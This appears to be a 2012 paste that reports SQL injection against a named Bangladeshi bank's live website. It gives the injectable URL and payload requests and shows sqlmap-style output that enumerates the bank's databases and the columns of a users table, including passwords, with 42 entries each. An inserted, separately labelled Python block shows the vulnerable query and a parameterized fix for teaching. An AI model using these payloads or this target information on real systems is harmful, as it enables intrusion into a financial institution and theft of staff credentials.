human_mind_cracker

Bangladesh bank

Oct 25th, 2012
[*] SQL Injection:

SQL Injection (SQLi) is a code injection technique that exploits a security vulnerability in the database layer of a web application. The vulnerability is present when user input is either incorrectly filtered for string-literal escape characters embedded in SQL statements or not strongly typed, and is therefore unexpectedly executed as part of the query.

Solution: Sanitize all user-supplied data before using it as part of database queries.
  6.  
database: MySQL

request:

GET http://www.islamibankbd.com/branchinfo/branchDetail.php?BrDtlsID='%60%22XrojS HTTP/1.1
[*] Vuln on: http://www.islamibankbd.com/branchinfo/branchDetail.php?BrDtlsID=60'
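As an added illustration, not code from the paste or from the bank's site, the following Python/sqlite3 stand-in for the branchDetail.php lookup shows the concatenated query that turns the stray quote in the requests above into a database error, beside the typed, parameterized version that implements the "sanitize" advice. The table and column names are assumptions.

```python
import sqlite3
from urllib.parse import unquote

# Constructed stand-in for the branchDetail.php lookup; the site's real PHP and
# schema are not on the page, so table and column names here are assumed.
def setup_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE branchdtls (BrDtlsID INTEGER PRIMARY KEY, BranchName TEXT)")
    con.executemany("INSERT INTO branchdtls VALUES (?, ?)",
                    [(60, "Branch 60"), (61, "Branch 61")])
    return con

def lookup_vulnerable(con, raw_id):
    """The pattern behind the finding: the query-string value is pasted into SQL."""
    sql = "SELECT BranchName FROM branchdtls WHERE BrDtlsID='" + raw_id + "'"
    try:
        return [row[0] for row in con.execute(sql)]
    except sqlite3.Error as exc:
        # A stray quote breaks the statement. If this message reaches the HTTP
        # response it is exactly the error-based signal the paste reports, so
        # the fix must also keep database errors out of the page.
        return "DB error: " + str(exc)

def lookup_safe(con, raw_id):
    """Strong typing plus a bound parameter: input never becomes SQL syntax."""
    if not raw_id.isdigit():
        return None  # reject non-numeric ids (answer HTTP 400) without touching the DB
    rows = con.execute("SELECT BranchName FROM branchdtls WHERE BrDtlsID=?", (int(raw_id),))
    return [row[0] for row in rows]

if __name__ == "__main__":
    con = setup_db()
    # The three parameter values come from the requests quoted in the paste.
    for param in ("60", "60'", unquote("'%60%22XrojS")):
        print(repr(param), lookup_vulnerable(con, param), lookup_safe(con, param))
```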

available databases [2]:
[*] information_schema
[*] islamidb

Database: islamidb
[74 tables]
Database: islamidb
Table: users
[13 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| Address     | varchar(50)  |
| BranchName  | varchar(50)  |
| Depertment  | varchar(50)  |
| Designation | varchar(50)  |
| Email       | varchar(50)  |
| FullName    | varchar(50)  |
| IsActive    | tinyint(4)   |
| Mobile      | varchar(50)  |
| Password    | varchar(255) |
| Phone       | varchar(50)  |
| UserID      | int(11)      |
| UserName    | varchar(50)  |
| UserType    | char(1)      |
+-------------+--------------+

Database: islamidb
Table: users
Column: UserName
[42 entries]
Database: islamidb
Table: users
Column: FullName
[42 entries]
Database: islamidb
Table: users
Column: Password
[42 entries]